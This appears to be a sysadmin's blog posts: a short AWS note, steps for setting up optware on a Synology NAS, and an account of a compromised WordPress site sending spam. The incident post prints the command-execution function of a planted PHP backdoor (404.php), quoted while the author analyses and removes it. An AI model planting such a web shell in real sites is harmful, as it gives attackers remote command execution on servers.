This post is more as a note for myself, as a quick reference for the expanding list of Amazon AWS services. Not too long ago it was just EC3 and S3, and now you have stuff like Route 53, Glacier, Redshift and a whole bunch of others.
Good that someone compiled a nice summary here:
We recently got a Synology DS412+ as an office NAS. First thing to do is to set up a proper Linux environment on the device.
Gaining root on Synology NAS is easy – just log in as root with the same password as admin. However, most (all?) commands are mapped to BusyBox, which provides watered-down version of many *nix commands. Good thing is there’s an active modding community and it’s also sanctioned by Synology. A good place to start is here.
First install the bootstrap
cd /tmp wget http://ipkg.nslu2-linux.org/feeds/optware/syno-i686/cross/unstable/syno-i686-bootstrap_1.2-7_i686.xsh chmod u+x syno-i686-bootstrap_1.2-7_i686.xsh ./syno-i686-bootstrap_1.2-7_i686.xsh
Then install optware-devel, which installs many of the common *nix tools and binaries for building programs from tar source.
/opt/bin/ipkg install optware-devel
Unfortunately, installation fails halfway ‘cos wget-ssl which is included in optware-devel conflicts with the wget installed.
# ipkg install -verbose_wget wget-ssl
Installing wget-ssl (1.12-2) to root...
Nothing to be done
An error ocurred, return value: 1.
Collected errors:
ERROR: The following packages conflict with wget-ssl:
wget
Someone posted a solution here and here, but both are for arm-based devices. Digging further, I found the source of the i686 packages here and with that the problem is resolved.
cd /tmp wget 'http://ipkg.nslu2-linux.org/feeds/optware/syno-i686/cross/unstable/libidn_1.25-1_i686.ipk' wget 'http://ipkg.nslu2-linux.org/feeds/optware/syno-i686/cross/unstable/wget-ssl_1.12-2_i686.ipk' ipkg remove wget ipkg install libidn_1.25-1_i686.ipk ipkg install wget-ssl_1.12-2_i686.ipk export PATH=/opt/bin:$PATH ipkg update ipkg install optware-devel
The export step is important, ‘cos it will make ipkg use the new wget.
A few other things to finish up,
It was the first working day after Chinese New Year. I arrived in office and did the usual morning routine. What I didn’t anticipate was the 10000 emails waiting for me in my INBOX. And the number kept rising.
Not exactly the most auspicious start to the new year. Most of them had the subject “Undelivered Mail Returned to Sender”. I thought it was just the usual case of someone faking the sender email using our domain but upon closer inspection, it turns out to be much worse than expected.
A lot of the email headers had the following line:
X-PHP-Originating-Script: 1028:404.php(173) : eval()'d code(1) : eval()'d code
After some digging, I found the offending 404.php, which contains code like this:
function execute($c){
if(function_exists('exec')){
@exec($c, $out);
return @implode("\n", $out);
}elseif(function_exists('shell_exec')){
$out = @shell_exec($c);
return $out;
}elseif(function_exists('system')){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists('passthru')){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}
It’s clearly a backdoor. One of our website had been compromised. And it was being used to send out large amount of spam.
The reason for those 10000 bounced emails is due to the fact that many of the emails used by spammers are simply invalid or not in use anymore. The recipient’s email server is usually kind enough to notify the sender – in this case us – of this. This also means that the actual number of spam emails sent out is much higher than 10000.
I wasted no time to hunt down the offending 404.php and remove it. Subsequent actions were more tricky. In any site compromise, determining the cause of compromise is imperative to prevent future attempts. The initial suspicion was WordPress theme vulnerability, but Googling didn’t turn up anything unusual. Maybe a 0-day? After eliminating a few possible causes and not finding any, I went on to the more urgent task of purging the email queue and checking if we were blacklisted by any spam database. You see, the cat-and-mouse game of spam detection has evolved to a point where a sysadmin must decide what mix bag of spam prevention techniques to use. One of them includes using a spam database lookup service. Being in one is no good, ‘cos it means legitimate emails originating from your server will have a higher chance of being marked as spam. True enough, we were blacklisted by one service provider. Fotunately a review request quickly allowed us to be removed from being blacklisted.
After hitting a few real 404s, the attacker gave up and the spam stopped, thereby drawing a close to the episode. Or so I thought.